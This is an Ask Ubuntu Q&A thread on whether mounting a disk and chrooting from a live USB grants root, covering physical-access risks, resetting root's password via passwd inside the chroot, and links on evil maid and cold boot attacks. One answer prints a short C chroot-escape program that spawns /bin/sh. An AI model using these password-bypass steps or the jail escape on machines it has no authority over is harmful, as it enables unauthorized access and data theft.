Does Chroot'ing onto a Ubuntu Machine Give You Root?

Question

If you were to use a Ubuntu live USB, and do the commands below. Is this literally just giving you root access to the drive?

sudo mount /dev/sda1 /mnt
sudo chroot /mnt

If you can sudo you have root access to everything on the machine! — chicks, Mar 14 '16 at 20:57
@chicks - well yes, the point here, IMHO, is that physical access equates to root access via a number of methods. — Panther, Mar 15 '16 at 11:10

score 8 · Accepted Answer · edited Mar 15 '16 at 01:45

Physical access is root access as Zacharee1 indicates. This is why people with sensitive data restrict physical access.

To break you commands down a bit though, mounting the drive is what prepares the file system and gives you access.

sudo mount /dev/sda1 /mnt

After that mount command you can access all unencrypted data on /dev/sda1

ls /mnt
cp /mnt/some_data /your_usb

etc

A work of caution, if someone had physical access encryption may not be sufficient to protect the data as people can leverage physical access to break the encryption, "Evil Maid" is but one example, see https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html

The chroot command switches so that now you are running commands as if /dev/sda1 is mounted at / or root, assuming /dev/sda1 is a valid root file system and not /home or a data partition.

The chroot command has many uses above and beyond data access.

So after the chroot command, the commands you run in the shell now affect /dev/sda1. So if you change the password or system configuration, it affects /dev/sda1 and not the usb.

so, for example, if you run

passwd

the password you set affects the root user on /dev/sda1 and not root on the usb.

Some virtualization, Openvz and LXC for example, are similar to a chroot but have additional features.

For additional information on chroot see

https://help.ubuntu.com/community/BasicChroot

score 6 · Answer 2 · edited Apr 13 '17 at 12:24

6

Unless the filesystem is encrypted, you have full access to every file on an offline drive (i.e. from the LiveUSB). You can do whatever you want without having any user's password from that OS.

The LiveUSB method is one of the most popular ways to bypass passwords on both Windows and Linux, as it allows a user to set a local administrator password in Windows and a root password in Linux by replacing files or running some commands.

It's pretty great, as long as you're the one with hardware access and not someone you don't trust.

EDIT:
Thanks to bodhi.zazen I now know that, even with encryption, you can gain access to a filesystem. You do need the unwitting interaction of someone who knows the encryption key, but it's still a method for access.

Read about it here: https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html

EDITEDIT:
Apparently there are a lot of ways to access encrypted filesystems.
https://www.schneier.com/blog/archives/2008/02/cold_boot_attac.html

I guess the lesson here is don't give people your hard drive.

edited Apr 13 '17 at 12:24

Community

1

answered Mar 14 '16 at 12:55

TheWanderer

19,395
12
50
65

take care, with physical access encryption can be broken see https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html and https://xkcd.com/538/ – Panther Mar 14 '16 at 13:15
@bodhi.zazen Wow, that's pretty interesting. I'll edit that in. – TheWanderer Mar 14 '16 at 13:16
Few questions on this. So you are confirming that this is giving your root access? Ok. What I don't understand is how chroot'ing works on systems with a different OS. For example, on an Archlinux Live USB, you have to do an arch-chroot to be able to mount it (i tested this on my Arch machine). But on Ubuntu live USB it's just the commands stated in my initial question. I am wondering what the difference is? If it's OS dependent, does this mean I could use the Ubuntu live USB to chroot into my Arch hard drive? – john smith Mar 14 '16 at 13:23
"Evil Maid" is not the only method to circumvent encryption mind you ;) https://www.schneier.com/blog/archives/2008/02/cold_boot_attac.html – Panther Mar 14 '16 at 13:24
@johnsmith I don't believe it's OS dependent. I think it's just that the two OSes have different commands to do the same thing. However, that's a little beyond my knowledge. You could ask that in a question on [su] though :). – TheWanderer Mar 14 '16 at 13:27
@bodhi.zazen editing – TheWanderer Mar 14 '16 at 13:27
@johnsmith - a chroot uses the kernel on the usb, but you run arch specific command in the chroot, so pacman rather then apt to install on an arch chroot. See the information I gave you and ask another question as now your are starting another question in the comments. – Panther Mar 14 '16 at 13:32
Ok thanks, i will do some reading first, and if I get stuck I'll ask another question. Just realised your reply below! – john smith Mar 14 '16 at 13:35
Can you tell me something on this topic though, why, when you do the sudo command from the live USB for the mounting and chroot'ing that you don't need to punch a password in? Is the password setting on the live USB just unenforced? If so, why have they installed sudo on the live USB? It seems pointless. – john smith Mar 14 '16 at 13:44
@johnsmith Since the LiveUSB doesn't have any passwords set up, it can't ask you for one. sudo is still there as a protection measure, just like it is in normal Ubuntu. A user who doesn't know what they're doing might open a terminal and run rm -rf /home, which won't work without sudo. Even if there's no password needed, it's still an extra step to prevent accidental mess-ups. – TheWanderer Mar 14 '16 at 13:48
@johnsmith - The live CD is intended for testing hardware, system recovery, and installing, not to function as a secured installation. The live iso does not have security updates, ever, for example. – Panther Mar 14 '16 at 15:57

score 3 · Answer 3 · answered Mar 14 '16 at 19:40

Chroot is not what gives you root, sudo is. Most livecds have sudo configured such that the default user on the livecd has unrestricted no-password sudo access. Typing "sudo bash" instead would have given you just the same permissions but with a different view of the filesystem.

So yes if you can boot a livecd and the hdd is not encrypted you can easilly buypass any file permissions and read/wite whatever you like but chroot is not what enables that, booting the livecd which contains a system on which you can trivially get root is.

score 1 · Answer 4 · answered Mar 14 '16 at 23:11

Let us say you are asking the following question: "If I gave somebody permission to run sudo chroot /mnt" can they get root on the host?" The answer to that question is yes.

Besides the obvious hard way involving mknod(), there's an easy way if they can get a compiler:

#include <fcntl.h>
#include <unistd.h>
int main() {
    int n = open("/", 0);
    chroot("/bin");
    fchdir(n);
    chdir("..");
    chroot(".");
    execve("/bin/sh", "/bin/sh");
}

Chroot jails do nothing if the attacker has root.

Does Chroot'ing onto a Ubuntu Machine Give You Root?

4 Answers4